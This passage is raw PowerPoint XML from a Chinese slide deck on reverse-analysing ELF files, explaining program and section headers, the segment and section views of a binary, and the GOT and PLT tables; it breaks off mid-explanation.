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531" r:id="rId5"/>
    <p:sldId id="637" r:id="rId6"/>
    <p:sldId id="639" r:id="rId7"/>
    <p:sldId id="640" r:id="rId8"/>
    <p:sldId id="641" r:id="rId9"/>
    <p:sldId id="642" r:id="rId10"/>
    <p:sldId id="675" r:id="rId11"/>
    <p:sldId id="711" r:id="rId12"/>
    <p:sldId id="676" r:id="rId13"/>
    <p:sldId id="710" r:id="rId14"/>
    <p:sldId id="643" r:id="rId15"/>
    <p:sldId id="644" r:id="rId16"/>
    <p:sldId id="677" r:id="rId17"/>
    <p:sldId id="737" r:id="rId18"/>
    <p:sldId id="649" r:id="rId19"/>
    <p:sldId id="651" r:id="rId20"/>
    <p:sldId id="652" r:id="rId21"/>
    <p:sldId id="653" r:id="rId22"/>
    <p:sldId id="654" r:id="rId23"/>
    <p:sldId id="718" r:id="rId24"/>
    <p:sldId id="656" r:id="rId25"/>
    <p:sldId id="657" r:id="rId26"/>
    <p:sldId id="658" r:id="rId27"/>
    <p:sldId id="659" r:id="rId28"/>
    <p:sldId id="712" r:id="rId29"/>
    <p:sldId id="713" r:id="rId30"/>
    <p:sldId id="714" r:id="rId31"/>
    <p:sldId id="715" r:id="rId32"/>
    <p:sldId id="716" r:id="rId33"/>
    <p:sldId id="664" r:id="rId34"/>
    <p:sldId id="665" r:id="rId35"/>
    <p:sldId id="666" r:id="rId36"/>
    <p:sldId id="667" r:id="rId37"/>
    <p:sldId id="258" r:id="rId38"/>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E1CC49B-1FF1-4EB0-80CB-08A2F764A532}">
          <p14:sldIdLst>
            <p14:sldId id="261"/>
            <p14:sldId id="531"/>
            <p14:sldId id="637"/>
            <p14:sldId id="639"/>
            <p14:sldId id="640"/>
            <p14:sldId id="641"/>
            <p14:sldId id="642"/>
            <p14:sldId id="675"/>
            <p14:sldId id="711"/>
            <p14:sldId id="676"/>
            <p14:sldId id="710"/>
            <p14:sldId id="643"/>
            <p14:sldId id="644"/>
            <p14:sldId id="677"/>
            <p14:sldId id="737"/>
            <p14:sldId id="649"/>
            <p14:sldId id="651"/>
            <p14:sldId id="652"/>
            <p14:sldId id="653"/>
            <p14:sldId id="654"/>
            <p14:sldId id="718"/>
            <p14:sldId id="656"/>
            <p14:sldId id="657"/>
            <p14:sldId id="658"/>
            <p14:sldId id="659"/>
            <p14:sldId id="712"/>
            <p14:sldId id="713"/>
            <p14:sldId id="714"/>
            <p14:sldId id="715"/>
            <p14:sldId id="716"/>
            <p14:sldId id="664"/>
            <p14:sldId id="665"/>
            <p14:sldId id="666"/>
            <p14:sldId id="66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69" autoAdjust="0"/>
    <p:restoredTop sz="89273" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="64" d="100"/>
          <a:sy n="64" d="100"/>
        </p:scale>
        <p:origin x="10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859DBF2-DE71-4E9A-B62E-174E98AF99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C57E396-5B0B-47B6-AFC2-972ED9C6CA4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14600" y="857250"/>
            <a:ext cx="4114800" cy="2314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2" y="1035051"/>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EB5CB55D-21C7-42AE-8D39-10FD3765999E}"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CAC5E12F-E468-448A-B39E-4E0E02B208EE}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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2D3BDBDD-3CE6-4418-B556-0CF820AF305B}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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1B012AFD-F177-4E66-918A-9132F1ADDF6E}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10710865" y="4246564"/>
            <a:ext cx="1387476" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>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不足和未来可改进之处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9" y="4545014"/>
            <a:ext cx="774700" cy="246221"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11045827"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sz="1800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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2" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{110901CC-F5D0-40E4-941E-6AF0B0F60A4A}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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E51CB62-C161-4161-9E1E-356A4EDB5256}" type="datetime1">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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6A0C1ACD-275B-4494-8ECF-445F13FF90A9}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>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2"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2"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5C28F5A-0BF1-4AF2-BB72-6007895C36E5}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符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spd="slow" p14:dur="1000"/>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow"/>
    </mc:Fallback>
  </mc:AlternateConten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rgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="153904" y="2487952"/>
            <a:ext cx="11656193" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ELF文件的逆向分析</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1"/>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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1928813" y="3943577"/>
            <a:ext cx="619918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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9E491E42-D657-49D1-8EB6-0CACAB33E671}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9269730" y="4136390"/>
            <a:ext cx="2540000" cy="429895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>刘军杰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	  2021/1/3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="22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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268730" y="1165860"/>
            <a:ext cx="3929380" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序头部（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Program Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="1534160"/>
            <a:ext cx="7964170" cy="1751330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="3503930"/>
            <a:ext cx="4080510" cy="2519045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5463540" y="3769360"/>
            <a:ext cx="5410835" cy="298450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506720" y="4037965"/>
            <a:ext cx="5450205" cy="1602105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5506720" y="1410970"/>
            <a:ext cx="5742940" cy="455422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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268730" y="1165860"/>
            <a:ext cx="3929380" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>节区头部（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>Section Header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>数据结构如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1302385" y="2254885"/>
            <a:ext cx="3108960" cy="3520440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714875" y="2465705"/>
            <a:ext cx="6346825" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_name表示节区名称</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_type表示节区类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_flags表示节的类型是否是可执行节，内容是否可以修改</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_addr表示节区在第一个字节应处的位置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_offset表示节区第一个字节相对文件头的偏移</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_size表示节区的大小（单位字节）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_link表示节区头部表索引链接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_info表示节区的附加信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_addralign用于地址对齐</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>sh_entsize表示符号表相关</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4795520" y="1440180"/>
            <a:ext cx="5388610" cy="451739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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="452755" y="994410"/>
            <a:ext cx="7054850" cy="5361940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7706995" y="751840"/>
            <a:ext cx="3576320" cy="5354320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>左边是从汇编器和链接器的视角来看这个文件，开头的ELF Header描述了体系结构和操作系统等基本信息，并指出Section Header Table和Program Header Table在文件中的什么位置，Program Header Table在汇编和链接过程中没有用到，所以是可有可无的，Section Header Table中保存了所有Section的描述信息。右边是从加载器的视角来看这个文件，开头是ELF Header，Program Header Table中保存了所有Segment的描述信息，Section Header Table在加载过程中没有用到，所以是可有可无的。Section Header Table和Program Header Table并不是一定要位于文件开头和结尾的，其位置由ELF Header指出。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996950" y="1388110"/>
            <a:ext cx="10447655" cy="2030095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>segments是从运行的角度来描述elf文件，sections是从链接的角度来描述elf文件，也就是说，在链接阶段，我们可以忽略program header table来处理此文件，在运行阶段可以忽略section header table来处理此程序， segments与sections是包含的关系，一个segment包含若干个section。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>	在程序中，段（segment）并不等于节（section）。段是程序执行的必要组成部分，在每个段中，会有代码或者数据被划分为不同的节。节头表是对这些节的位置和大小描述，主要用于链接和调试。节头表对于程序的执行来说不是必需的，没有节头表，程序仍然可以正常执行，因为节头表没有对程序的内存布局进行描述，对程序内存布局描述是程序头表的任务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900754" y="1019621"/>
            <a:ext cx="10523531"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bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.got&amp;&amp; .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &amp;&amp;.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="976630" y="1871345"/>
            <a:ext cx="10670540" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GOT: Global Offset Table ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>全局偏移表， 包括了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>前者是全局变量，后者是全局函数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>相当于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>全局偏移表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其内容有两种情况</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, 1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果在之前查找过该符号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>内容为外部函数的具体地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>. 2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果没查找过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>则内容为跳转回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
